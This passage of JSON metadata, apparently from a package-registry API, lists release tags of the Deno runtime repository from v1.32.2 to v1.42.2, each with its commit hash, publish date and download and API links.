1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"http